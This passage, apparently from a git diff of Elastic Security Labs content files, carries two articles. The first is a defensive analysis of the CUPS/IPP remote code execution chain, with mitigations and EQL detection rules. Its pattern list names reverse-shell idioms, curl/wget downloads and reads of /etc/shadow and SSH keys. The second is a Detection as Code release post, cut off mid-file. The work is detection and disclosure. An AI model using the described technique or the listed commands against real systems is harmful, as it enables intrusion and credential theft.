vulnerabilities allow an unauthenticated remote attacker to exploit the printing system via IPP (Internet Printing Protocol) and mDNS to achieve remote code execution (RCE) on affected systems. \n* The attack can be initiated over the public internet or local network, targeting the UDP port 631 exposed by `cups-browsed` without any authentication requirements.\n* The vulnerability chain includes the `foomatic-rip` filter, which permits the execution of arbitrary commands through the `FoomaticRIPCommandLine` directive, a known ([CVE-2011-2697](https://nvd.nist.gov/vuln/detail/CVE-2011-2697), [CVE-2011-2964](https://nvd.nist.gov/vuln/detail/CVE-2011-2964)) but unpatched issue since 2011. \n* Systems affected include most GNU/Linux distributions, BSDs, ChromeOS, and Solaris, many of which have the `cups-browsed` service enabled by default. \n* By the title of the publication, “Attacking UNIX Systems via CUPS, Part I” Margaritelli likely expects to publish further research on the topic.\n* Elastic has provided protections and guidance to help organizations detect and mitigate potential exploitation of these vulnerabilities.\n\n## The CUPS RCE at a glance\n\nOn September 26, 2024, security researcher Simone Margaritelli (@evilsocket) [uncovered](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/) a chain of critical vulnerabilities in the CUPS (Common Unix Printing System) utilities, specifically in components like `cups-browsed`, `libcupsfilters`, and `libppd`. These vulnerabilities — identified as [CVE-2024-47176](https://www.cve.org/CVERecord?id=CVE-2024-47176), [CVE-2024-47076](https://www.cve.org/CVERecord?id=CVE-2024-47076), [CVE-2024-47175](https://www.cve.org/CVERecord?id=CVE-2024-47175), and [CVE-2024-47177](https://www.cve.org/CVERecord?id=CVE-2024-47177) — affect widely adopted UNIX systems such as GNU/Linux, BSDs, ChromeOS, and Solaris, exposing them to remote code execution (RCE).\n\nAt the core of the issue is the lack of input validation in the CUPS components, which allows attackers to exploit the Internet Printing Protocol (IPP). Attackers can send malicious packets to the target's UDP port `631` over the Internet (WAN) or spoof DNS-SD/mDNS advertisements within a local network (LAN), forcing the vulnerable system to connect to a malicious IPP server.\n\nFor context, the IPP is an application layer protocol used to send and receive print jobs over the network. These communications include sending information regarding the state of the printer (paper jams, low ink, etc.) and the state of any jobs. IPP is supported across all major operating systems including Windows, macOS, and Linux. When a printer is available, the printer broadcasts (via DNS) a message stating that the printer is ready including its Uniform Resource Identifier (URI). When Linux workstations receive this message, many Linux default configurations will automatically add and register the printer for use within the OS. As such, the malicious printer in this case will be automatically registered and made available for print jobs.\n\nUpon connecting, the malicious server returns crafted IPP attributes that are injected into PostScript Printer Description (PPD) files, which are used by CUPS to describe printer properties. These manipulated PPD files enable the attacker to execute arbitrary commands when a print job is triggered.\n\nOne of the major vulnerabilities in this chain is the `foomatic-rip` filter, which has been known to allow arbitrary command execution through the FoomaticRIPCommandLine directive. Despite being vulnerable for over a decade, it remains unpatched in many modern CUPS implementations, further exacerbating the risk.\n\n> While these vulnerabilities are highly critical with a CVSS score as high as 9.9, they can be mitigated by disabling cups-browsed, blocking UDP port 631, and updating CUPS to a patched version. Many UNIX systems have this service enabled by default, making this an urgent issue for affected organizations to address.\n\n## Elastic’s POC analysis\n\nElastic’s Threat Research Engineers initially located the original proof-of-concept written by @evilsocket, which had been leaked. However, we chose to utilize the [cupshax](https://github.com/RickdeJager/cupshax/blob/main/cupshax.py) proof of concept (PoC) based on its ability to execute locally. \n\nTo start, the PoC made use of a custom Python class that was responsible for creating and registering the fake printer service on the network using mDNS/ZeroConf. This is mainly achieved by creating a ZeroConf service entry for the fake Internet Printing Protocol (IPP) printer. \n\nUpon execution, the PoC broadcasts a fake printer advertisement and listens for IPP requests. When a vulnerable system sees the broadcast, the victim automatically requests the printer's attributes from a URL provided in the broadcast message. The PoC responds with IPP attributes including the FoomaticRIPCommandLine parameter, which is known for its history of CVEs. The victim generates and saves a [PostScript Printer Description](https://en.wikipedia.org/wiki/PostScript_Printer_Description) (PPD) file from these IPP attributes.\n\nAt this point, continued execution requires user interaction to start a print job and choose to send it to the fake printer. Once a print job is sent, the PPD file tells CUPS how to handle the print job. The included FoomaticRIPCommandLine directive allows the arbitrary command execution on the victim machine.\n\nDuring our review and testing of the exploits with the Cupshax PoC, we identified several notable hurdles and key details about these vulnerable endpoint and execution processes.\n\nWhen running arbitrary commands to create files, we noticed that `lp` is the user and group reported for arbitrary command execution, the [default printing group](https://wiki.debian.org/SystemGroups#:~:text=lp%20(LP)%3A%20Members%20of,jobs%20sent%20by%20other%20users.) on Linux systems that use CUPS utilities. Thus, the Cupshax PoC/exploit requires both the CUPS vulnerabilities and the `lp` user to have sufficient permissions to retrieve and run a malicious payload. By default, the `lp` user on many systems will have these permissions to run effective payloads such as reverse shells; however, an alternative mitigation is to restrict `lp` such that these payloads are ineffective through native controls available within Linux such as AppArmor or SELinux policies, alongside firewall or IPtables enforcement policies. \n\nThe `lp` user in many default configurations has access to commands that are not required for the print service, for instance `telnet`. To reduce the attack surface, we recommend removing unnecessary services and adding restrictions to them where needed to prevent the `lp` user from using them. \n\nWe also took note that interactive reverse shells are not immediately supported through this technique, since the `lp` user does not have a login shell; however, with some creative tactics, we were able to still accomplish this with the PoC. Typical PoCs test the exploit by writing a file to `/tmp/`, which is trivial to detect in most cases. Note that the user writing this file will be `lp` so similar behavior will be present for attackers downloading and saving a payload on disk.\n\nAlongside these observations, the parent process, `foomatic-rip` was observed in our telemetry executing a shell, which is highly uncommon\n\n## Executing the ‘Cupshax’ POC\n\nTo demonstrate the impact of these vulnerabilities, we attempted to accomplish two different scenarios: using a payload for a reverse shell using living off the land techniques and retrieving and executing a remote payload. These actions are often common for adversarial groups to attempt to leverage once a vulnerable system is identified. While in its infancy, widespread exploitation has not been observed, but likely will replicate some of the scenarios depicted below.\n\nOur first attempts running the Cupshax PoC were met with a number of minor roadblocks due to the default user groups assigned to the `lp` user — namely restrictions around interactive logon, an attribute common to users that require remote access to systems. This did not, however, impact our ability to download a remote payload, compile, and execute on the impacted host system:\n\n\n\nContinued testing was performed around reverse shell invocation, successfully demonstrated below: \n\n\n\n## Assessing impact\n\n* **Severity:** These vulnerabilities are given CVSS scores [controversially](https://x.com/evilsocket/status/1838220677389656127) up to 9.9, indicating a critical severity. The widespread use of CUPS and the ability to remotely exploit these vulnerabilities make this a high-risk issue.\n* **Who is affected?:** The vulnerability affects most UNIX-based systems, including major GNU/Linux distributions and other operating systems like ChromeOS and BSDs running the impacted CUPS components. Public-facing or network-exposed systems are particularly at risk. Further guidance, and notifications will likely be provided by vendors as patches become available, alongside further remediation steps. Even though CUPS usually listens on localhost, the Shodan Report [highlights](https://x.com/shodanhq/status/1839418045757845925) that over 75,000 CUPS services are exposed on the internet.\n* **Potential Damage:** Once exploited, attackers can gain control over the system to run arbitrary commands. Depending on the environment, this can lead to data exfiltration, ransomware installation, or other malicious actions. Systems connected to printers over WAN are especially at risk since attackers can exploit this without needing internal network access. \n\n## Remediations\n\nAs [highlighted](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Remediation) by @evilsocket, there are several remediation recommendations.\n\n* Disable and uninstall the `cups-browsed` service. For example, see the recommendations from [Red Hat](https://www.redhat.com/en/blog/red-hat-response-openprinting-cups-vulnerabilities) and [Ubuntu](https://ubuntu.com/blog/cups-remote-code-execution-vulnerability-fix-available).\n* Ensure your CUPS packages are updated to the latest versions available for your distribution.\n* If updating isn’t possible, block UDP port `631` and DNS-SD traffic from potentially impacted hosts, and investigate the aforementioned recommendations to further harden the `lp` user and group configuration on the host.\n\n## Elastic protections\n\nIn this section, we look into detection and hunting queries designed to uncover suspicious activity linked to the currently published vulnerabilities. By focusing on process behaviors and command execution patterns, these queries help identify potential exploitation attempts before they escalate into full-blown attacks.\n\n### cupsd or foomatic-rip shell execution\n\nThe first detection rule targets processes on Linux systems that are spawned by `foomatic-rip` and immediately launch a shell. This is effective because legitimate print jobs rarely require shell execution, making this behavior a strong indicator of malicious activity. Note: A shell may not always be an adversary’s goal if arbitrary command execution is possible. \n\n```\nprocess where host.os.type == \"linux\" and event.type == \"start\" and\n event.action == \"exec\" and process.parent.name == \"foomatic-rip\" and\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") \n and not process.command_line like (\"*/tmp/foomatic-*\", \"*-sDEVICE=ps2write*\")\n```\n\nThis query managed to detect all 33 PoC attempts that we performed:\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml\n\n### Printer user (lp) shell execution\n\nThis detection rule assumes that the default printer user (`lp`) handles the printing processes. By specifying this user, we can narrow the scope while broadening the parent process list to include `cupsd`. Although there's currently no indication that RCE can be exploited through `cupsd`, we cannot rule out the possibility.\n\n```\nprocess where host.os.type == \"linux\" and event.type == \"start\" and\n event.action == \"exec\" and user.name == \"lp\" and\n process.parent.name in (\"cupsd\", \"foomatic-rip\", \"bash\", \"dash\", \"sh\", \n \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.name in (\"bash\", \"dash\", \n \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and not process.command_line \n like (\"*/tmp/foomatic-*\", \"*-sDEVICE=ps2write*\")\n```\n\nBy focusing on the username `lp`, we broadened the scope and detected, like previously, all of the 33 PoC executions:\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml\n\n### Network connection by CUPS foomatic-rip child\n\nThis rule identifies network connections initiated by child processes of `foomatic-rip`, which is a behavior that raises suspicion. Since legitimate operations typically do not involve these processes establishing outbound connections, any detected activity should be closely examined. If such communications are expected in your environment, ensure that the destination IPs are properly excluded to avoid unnecessary alerts.\n\n```\nsequence by host.id with maxspan=10s\n [process where host.os.type == \"linux\" and event.type == \"start\" \n and event.action == \"exec\" and\n process.parent.name == \"foomatic-rip\" and\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")] \n by process.entity_id\n [network where host.os.type == \"linux\" and event.type == \"start\" and \n event.action == \"connection_attempted\"] by process.parent.entity_id\n```\n\nBy capturing the parent/child relationship, we ensure the network connections originate from the potentially compromised application. \n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml\n\n### File creation by CUPS foomatic-rip child\n\nThis rule detects suspicious file creation events initiated by child processes of foomatic-rip. As all current proof-of-concepts have a default testing payload of writing to a file in `/tmp/`, this rule would catch that. Additionally, it can detect scenarios where an attacker downloads a malicious payload and subsequently creates a file.\n\n```\nsequence by host.id with maxspan=10s\n [process where host.os.type == \"linux\" and event.type == \"start\" and \n event.action == \"exec\" and process.parent.name == \"foomatic-rip\" and \n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")] by process.entity_id\n [file where host.os.type == \"linux\" and event.type != \"deletion\" and\n not (process.name == \"gs\" and file.path like \"/tmp/gs_*\")] by process.parent.entity_id\n```\n\nThe rule excludes `/tmp/gs_*` to account for default `cupsd` behavior, but for enhanced security, you may choose to remove this exclusion, keeping in mind that it may generate more noise in alerts.\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml\n\n### Suspicious execution from foomatic-rip or cupsd parent\n\nThis rule detects suspicious command lines executed by child processes of `foomatic-rip` and `cupsd`. It focuses on identifying potentially malicious activities, including persistence mechanisms, file downloads, encoding/decoding operations, reverse shells, and shared-object loading via GTFOBins.\n\n```\nprocess where host.os.type == \"linux\" and event.type == \"start\" and \n event.action == \"exec\" and process.parent.name in \n (\"foomatic-rip\", \"cupsd\") and process.command_line like (\n // persistence\n \"*cron*\", \"*/etc/rc.local*\", \"*/dev/tcp/*\", \"*/etc/init.d*\", \n \"*/etc/update-motd.d*\", \"*/etc/sudoers*\",\n \"*/etc/profile*\", \"*autostart*\", \"*/etc/ssh*\", \"*/home/*/.ssh/*\", \n \"*/root/.ssh*\", \"*~/.ssh/*\", \"*udev*\", \"*/etc/shadow*\", \"*/etc/passwd*\",\n // Downloads\n \"*curl*\", \"*wget*\",\n\n // encoding and decoding\n \"*base64 *\", \"*base32 *\", \"*xxd *\", \"*openssl*\",\n\n // reverse connections\n \"*GS_ARGS=*\", \"*/dev/tcp*\", \"*/dev/udp/*\", \"*import*pty*spawn*\", \"*import*subprocess*call*\", \"*TCPSocket.new*\",\n \"*TCPSocket.open*\", \"*io.popen*\", \"*os.execute*\", \"*fsockopen*\", \"*disown*\", \"*nohup*\",\n\n // SO loads\n \"*openssl*-engine*.so*\", \"*cdll.LoadLibrary*.so*\", \"*ruby*-e**Fiddle.dlopen*.so*\", \"*Fiddle.dlopen*.so*\",\n \"*cdll.LoadLibrary*.so*\",\n\n // misc. suspicious command lines\n \"*/etc/ld.so*\", \"*/dev/shm/*\", \"*/var/tmp*\", \"*echo*\", \"*>>*\", \"*|*\"\n)\n```\n\nBy making an exception of the command lines as we did in the rule above, we can broaden the scope to also detect the `cupsd` parent, without the fear of false positives.\n\n\n\nhttps://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml\n\n### Elastic’s Attack Discovery\n\nIn addition to prebuilt content published, [Elastic’s Attack Discovery](https://www.elastic.co/guide/en/security/current/attack-discovery.html) can provide context and insights by analyzing alerts in your environment and identifying threats by leveraging Large Language Models (LLMs). In the following example, Attack Discovery provides a short summary and a timeline of the activity. The behaviors are then mapped to an attack chain to highlight impacted stages and help triage the alerts.\n\n\n\n## Conclusion\n\nThe recent CUPS vulnerability disclosure highlights the evolving threat landscape, underscoring the importance of securing services like printing. With a high CVSS score, this issue calls for immediate action, particularly given how easily these flaws can be exploited remotely. Although the service is installed by default on some UNIX OS (based on supply chain), manual user interaction is needed to trigger the printer job. We recommend that users remain vigilant, continue hunting, and not underestimate the risk. While the threat requires user interaction, if paired with a spear phishing document, it may coerce victims to print using the rogue printer. Or even worse, silently replacing existing printers or installing new ones as [indicated](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Impact) by @evilsocket.\n\nWe expect more to be revealed as the initial disclosure was labeled part 1. Ultimately, visibility and detection capabilities remain at the forefront of defensive strategies for these systems, ensuring that attackers cannot exploit overlooked vulnerabilities. \n\n## Key References\n\n* [https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/](https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/)\n* [https://github.com/RickdeJager/cupshax/blob/main/cupshax.py](https://github.com/RickdeJager/cupshax/blob/main/cupshax.py)\n* [https://www.cve.org/CVERecord?id=CVE-2024-47076](https://www.cve.org/CVERecord?id=CVE-2024-47076)\n* [https://www.cve.org/CVERecord?id=CVE-2024-47175](https://www.cve.org/CVERecord?id=CVE-2024-47175)\n* [https://www.cve.org/CVERecord?id=CVE-2024-47176](https://www.cve.org/CVERecord?id=CVE-2024-47176)\n* [https://www.cve.org/CVERecord?id=CVE-2024-47177](https://www.cve.org/CVERecord?id=CVE-2024-47177)\n\n*The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.*\n"
+ },
+ "title": "Cups Overflow: When your printer spills more than Ink",
+ "slug": "cups-overflow",
+ "date": "2024-09-28",
+ "description": "Elastic Security Labs discusses detection and mitigation strategies for vulnerabilities in the CUPS printing system, which allow unauthenticated attackers to exploit the system via IPP and mDNS, resulting in remote code execution (RCE) on UNIX-based systems such as Linux, macOS, BSDs, ChromeOS, and Solaris.",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ },
+ {
+ "slug": "terrance-dejesus"
+ },
+ {
+ "slug": "eric-forte"
+ },
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "cups-overflow.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ],
+ "tags": [
+ "linux",
+ "macos",
+ "cups",
+ "vulnerability",
+ "CVE-2024-47176",
+ "CVE-2024-47076",
+ "CVE-2024-47175",
+ "CVE-2024-47177"
+ ]
+ },
+ "id": "security_labs_content-cups_overflow-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dac_beta_release-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dac_beta_release-md.json
new file mode 100644
index 00000000000..ff5a1ccc94e
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-dac_beta_release-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Now in beta: New Detection as Code capabilities\"\nslug: \"dac-beta-release\"\ndate: \"2024-08-08\"\ndescription: \"\"\nauthor:\n - slug: mika-ayenson\n - slug: eric-forte\nimage: \"Security Labs Images 18.jpg\"\ncategory:\n - slug: detection-science\n---\n\nExciting news! Our Detections as Code (DaC) improvements to the [detection-rules](https://github.com/elastic/detection-rules) repo are now in beta. In May this year, we shared the Alpha stages of our research into [Rolling your own Detections as Code with Elastic Security](https://www.elastic.co/blog/detections-as-code-elastic-security). Elastic is working on supporting DaC in Elastic Security. While in the future DaC will be integrated within the UI, the current updates are focused on the detection rules repo on main to allow users to set up DaC quickly and get immediate value with available tests and commands integration with Elastic Security. We have a considerable amount of [documentation](https://dac-reference.readthedocs.io/en/latest/index.html) and [examples](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html), but let’s take a quick look at what this means for our users. \n\n## Why DaC?\n\nFrom validation and automation to enhancing cross-vendor content, there are several reasons [previously discussed](https://www.elastic.co/blog/detections-as-code-elastic-security#why-detections-as-code) to use a DaC approach for rule management. Our team of detection engineers have been using the detection rules repo for testing and validation of our rules for some time. We now can provide the same testing and validation that we perform in a more accessible way. We aim to empower our users by adding straightforward CLI commands within our detection-rules repo, to help manage rules across the full rule lifecycle between version control systems (VCS) and Kibana. This allows users to move, unit test, and validate their rules in a single command easily using CI/CD pipelines.\n\n## Improving Process Maturity\n\n\n\nSecurity organizations are facing the same bottomline, which is that we can’t rely on static out-of-the-box signatures. At its core, DaC is a methodology that applies software development practices to the creation and management of security detection rules, enabling automation, version control, testing, and collaboration in the development & deployment of security detections. Unit testing, peer review, and CI/CD enable software developers to be confident in their processes. These help catch errors and inefficiencies before they impact their customers. The same should be true in detection engineering. Fitting with this declaration here are some examples of some of the new features we are supporting. See our [DaC Reference Guide](https://dac-reference.readthedocs.io/en/latest/) for complete documentation.\n\n### Bulk Import and Export of Custom Rules\n\nCustom rules can now be moved in bulk to and from Kibana using the ```kibana import-rules``` and ```kibana export-rules``` commands. Additionally, one can move them in bulk to and from TOML format to ndjson using the ```import-rules-to-repo``` and ```export-rules-from-repo``` commands. In addition to rules, these commands support moving exceptions and exception lists using the appropriate flag. The ndjson approach's benefit is that it allows engineers to manage and share a collection of rules in a single file (exported by the CLI or from Kibana), which is helpful when access is not permitted to the other Elastic environment. When moving rules using either of these methods, the rules pass through schema validation unless otherwise specified to ensure that the rules contain the appropriate data fields. For more information on these commands, please see the [```CLI.md```](https://github.com/elastic/detection-rules/blob/DAC-feature/CLI.md) file in detection rules. \n\n### Configurable Unit Tests, Validation, and Schemas\n\nWith this new feature, we've now included the ability to configure the behavior of unit tests and schema validation using configuration files. In these files, you can now set specific tests to be bypassed, specify only specific tests to run, and likewise with schema validation against specific rules. You can run this validation and unit tests at any time by running ```make test```. Furthermore, you can now bring your schema (JSON file) to our validation process. You can also specify which schemas to use against which target versions of your Stack. For example, if you have custom schemas that only apply to rules in 8.14 while you have a different schema that should be used for 8.10, this can now be managed via a configuration file. For more information, please see our [example configuration file](https://github.com/elastic/detection-rules/blob/DAC-feature/detection_rules/etc/_config.yaml) or use our ```custom-rules setup-config``` command from the detection rules repo to generate an example for you.\n\n### Custom Version Control\n\nWe now are providing the ability to manage custom rules using the same version lock logic that Elastic’s internal team uses to manage our rules for release. This is done through a version lock file that checks the hash of the rule contents and determines whether or not they have changed. Additionally, we are providing a configuration option to disable this version lock file to allow users to use an alternative means of version control such as using a git repo directly. For more information please see the [version control section](https://dac-reference.readthedocs.io/en/latest/internals_of_the_detection_rules_repo.html#rule-versioning) of our documentation. Note that you can still rely on Kibana’s versioning fields.\n\nHaving these systems in place provides auditable evidence for maintaining security rules. Adopting some or all of these best practices can dramatically improve quality in maintaining and developing security rules.\n\n### Broader Adoption of Automation\n\nWhile quality is critical, security teams and organizations face growing rule sets to respond to an ever-expanding threat landscape. As such, it is just as crucial to reduce the strain on security analysts by providing rapid deployment and execution. For our repo, we have a single-stop shop where you can set your configuration, focus on rule development, and let the automation handle the rest. \n\n#### Lowering the Barrier to Entry\n\nTo start, simply clone or fork our detection rules repo, run ```custom-rules setup-config``` to generate an initial config, and import your rules. From here, you now have unit tests and validation ready for use. If you are using GitLab, you can quickly create CI/CD to push the latest rules to Kibana and run these tests. Here is an [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) of what that could look like:\n\n\n\n### High Flexibility\n\nWhile we use GitHub CI/CD for managing our release actions, by no means are we prescribing that this is the only way to manage detection rules. Our CLI commands have no dependencies outside of their python requirements. Perhaps you have already started implementing some DaC practices, and you may be looking to take advantage of the Python libraries we provide. Whatever the case may be, we want to encourage you to try adopting DaC principles in your workflows and we would like to provide flexible tooling to accomplish these goals. \n\nTo illustrate an example, let’s say we have an organization that is already managing their own rules with a VCS and has built automation to move rules back and forth from deployment environments. However, they would like to augment these movements with testing based on telemetry which they are collecting and storing in a database. Our DaC features already provide custom unit testing classes that can run per rule. Realizing this goal may be as simple as forking the detection rules repo and writing a single unit test. The figure below shows an example of what this could look like. \n\n\n\nThis new unit test could utilize our unit test classes and rule loading to provide scaffolding to load rules from a file or Kibana instance. Next, one could create different integration tests against each rule ID to see if they pass the organization's desired results (e.g. does the rule identify the correct behaviors). If they do, the CI/CD tooling can proceed as originally planned. If they fail, one can use DaC tooling to move those rules to a “needs tuning” folder and/or upload those rules to a “Tuning” Kibana space. In this way, one could use a hybrid of our tooling and one's own tooling to keep an up to date Kibana space (or VCS controlled folder) of what rules require updates. As updates are made and issues addressed, they could also be continually synchronized across spaces, leading to a more cohesive environment.\n\nThis is just one idea of how one can take advantage of our new DaC features in your environment. In practice, there are a vast number of different ways they can be utilized.\n\n## In Practice\n\nNow, let’s take a look at how we can tie these new features together into a cohesive DaC strategy. As a reminder, this is not prescriptive. Rather, this should be thought of as an optional, introductory strategy that can be built on to achieve your DaC goals.\n\n### Establishing a DaC Baseline\n\nIn detection engineering, we would like collaboration to be a default rather than an exception. Detection Rules is a public repo precisely with this precept in mind. Now, it can become a basis for the community and teammates to not only collaborate with us, but also with each other. Let’s use the chart below as an example for what this could look like. \n\n\n\nReading from left to right, we have initial planning and prioritization and the subsequent threat research that drives the detection engineering. This process will look quite different for each user so we are not going to spend much time describing it here. However, the outcome will largely be similar, the creation of new detection rules. These could be in various forms like Sigma rules (more in a later blog), Elastic TOML rule files, or creating the rules directly in Kibana. Regardless of format, once created these rules need to be staged. This would either occur in Kibana, your VCS, or both. From a DaC perspective, the goal is to sync the rules such that the process/automation are aware of these new additions. Furthermore, this provides the opportunity for peer review of these additions — the first stage of collaboration. \n\n\n\nThis will likely happen in your version control system; for instance, in GitHub one could use a PR with required approvals before merging back into a main branch that acts as the authoritative source of reviewed rules. The next step is for testing and validation, this step could additionally occur before peer review and this is largely up to the desired implementation. \n\n\n\nIn addition to any other internal release processes, by adhering to this workflow, we can reduce the risk of malformed rules and errant mistakes from reaching both our customers and the community. Additionally, having the evidence artifacts, passing unit tests, schema validation, etc., inspires confidence and provides control for each user to choose what risks they are willing to accept. \n\nOnce deployed and distributed, rule performance can be monitored from Kibana. Updates to these rules can be made either directly from Kibana or through the VCS. This will largely be dependent on the implementation specifics, but in either case, these can be treated very similarly to new rules and pass through the same peer review, testing, and validation processes.\n\n\n\nAs shown in the figure above, this can provide a unified method for handling rule updates whether from the community, customers, or from internal feedback. Since the rules ultimately exist as version-controlled files, there is a dedicated format source of truth to merge and test against. \n\nIn addition to the process quality improvements, having authoritative known states can empower additional automation. As an example, different customers may require different testing or perhaps different data sources. Instead of having to parse the rules manually, we provide a unified configuration experience where users can simply bring their own config and schemas and be confident that their specific requirements are met. All of this can be managed automatically via CI/CD. With a fully automated DaC setup, one can take advantage of this system entirely from VCS and Kibana without needing to write additional code. Let’s take a look at an example of what this could look like. \n\n### Example\n\nFor this example, we are going to be acting as an organization that has 2 Kibana spaces they want to manage via DaC. The first is a development space that rule authors will be using to write detection rules (so let’s assume there are some preexisting rules already available). There will also be some developers that are writing detection rules directly in TOML file formats and adding them to our VCS, so we will need to manage synchronization of these. Additionally, this organization wants to enforce unit testing and schema validation with the option for peer review on rules that will be deployed to a production space in the same Kibana instance. Finally, the organization wants all of this to occur in an automated manner with no requirement to either clone detection rules locally or write rules outside of a GUI. \n\nIn order to accomplish this we will need to make use of a few of the new DaC features in detection rules and write some simple CI/CD workflows. In this example we are going to be using GitHub. Additionally, you can find a video walkthrough of this example [here](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#demo-video). As a note, if you wish to follow along you will need to fork the detection rules repo and create an initial configuration using our ```custom-rules setup-config``` command. Also for general step by step instructions on how to use the DAC features, see this [quickstart guide](https://dac-reference.readthedocs.io/en/latest/etoe_reference_example.html#quick-start-example-detection-rules-cli-commands), which has several example commands.\n\n#### Development Space Rule Synchronization\n\nFirst we are going to synchronize from Kibana -> GitHub (VCS). To do this we will be using the ```kibana import-rules``` and ```kibana export-rules``` detection rules commands. Additionally, in order to keep the rule versions synchronized we will be using the locked versions file as we are wanting both our VCS and Kibana to be able to overwrite each other with the latest versions. This is not required for this setup, either Kibana or GitHub (VCS) could be used authoritatively instead of the locked versions file. But we will be using it for convenience. \n\nThe first step is for us to make a manual dispatch trigger that will pull the latest rules from Kibana upon request. In our setup this could be done automatically; however, we want to give rule authors control for when they want to move their rules to the VCS as the development space in Kibana is actively used for development and the presence of a new rule does not necessarily mean the rule is ready for VCS. The manual dispatch section could look like the following [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#option-1-manual-dispatch-pull):\n\n\n\nWith this trigger in place, we now can write 4 additional jobs that will trigger on this workflow dispatch. \n\n 1. Pull the rules from the desired Kibana space. \n 2. Update the version lock file. \n 3. Create a PR request for review to merge into the main branch in GitHub. \n 4. Set the correct target for the PR.\n\nThese jobs could look like this also from the same [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#option-1-manual-dispatch-pull):\n\n\n\nNow, once we run this workflow we should expect to see a PR open with the new rules from the Kibana Dev space. We also need to synchronize rules from GitHub (VCS) to Kibana. For this we will need to create a triggers on pull request:\n \n\n \nNext, we just need to create a job that uses the ```kibana import-rules``` command to push the rule files from the given PR to Kibana. See the second [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) for the complete workflow file.\n\n\n\nWith these two workflows complete we now have synchronization of rules between GitHub and the Kibana Dev space. \n\n### Production Space Deployment\n\nWith the Dev space synchronized, now we need to handle the prod space. As a reminder, for this we need to enforce unit testing, schema validation, available peer review for PRs to main, and on merge to main auto push to the prod space. To accomplish this we will need two workflow files. The first will run unit tests on all pull requests and pushes to versioned branches. The second will push the latest rules merged to main to the prod space in Kibana. \n\nThe first workflow file is very simple. It has an on push and pull_request trigger and has the core job of running the ```test``` command shown below. See this [example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_elastic_security_to_vcs.html#sub-component-3-optional-unit-testing-rules-via-ci-cd) for the full workflow.\n\n\n\nWith this ```test``` command we are performing unit tests and schema validation with the parameters specified in our config files on all of our custom rules. Now we just need the workflow to push the latest rules to the prod space. The core of this workflow is the ```kibana import-rules ```command again just using the prod space as the destination. However, there are a number of additional options provided to this workflow that are not necessary but nice to have in this example, such as options to overwrite and update exceptions/exception lists as well as rules. The core job is shown below. Please see [this example](https://dac-reference.readthedocs.io/en/latest/core_component_syncing_rules_and_data_from_vcs_to_elastic_security.html#option-1-push-on-merge) for the full workflow file.\n\n\n\nAnd there we have it, with those 4 workflow files we have a synchronized development space with rules passing through unit testing and schema validation. We have the option for peer review through the use of pull requests, which can be made as requirements in GitHub before allowing for merges to main. On merge to main in GitHub we also have an automated push to the Kibana prod space, establishing our baseline of rules that have passed our organizations requirements and are ready for use. All of this was accomplished without writing additional Python code, just by using our new DaC features in GitHub workflows.\n\n## Conclusion\n\nNow that we’ve reached this milestone, you may be wondering what’s next? We’re planning to spend the next few cycles continuing to test edge cases and incorporating feedback from the community as part of our business-as-usual sprints. We also have a backlog of features request considerations so if you want to voice your opinion, checkout the issues titled ```[FR][DAC] Consideration:``` or open a similar new issue if it’s not already recorded. This will help us to prioritize the most important features for the community.\n \nWe’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/detection-rules/issues), chat with us in our [security-rules-dac](https://elasticstack.slack.com/archives/C06TE19EP09) slack channel, and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!"
+ },
+ "title": "Now in beta: New Detection as Code capabilities",
+ "slug": "dac-beta-release",
+ "date": "2024-08-08",
+ "description": "",
+ "author": [
+ {
+ "slug": "mika-ayenson"
+ },
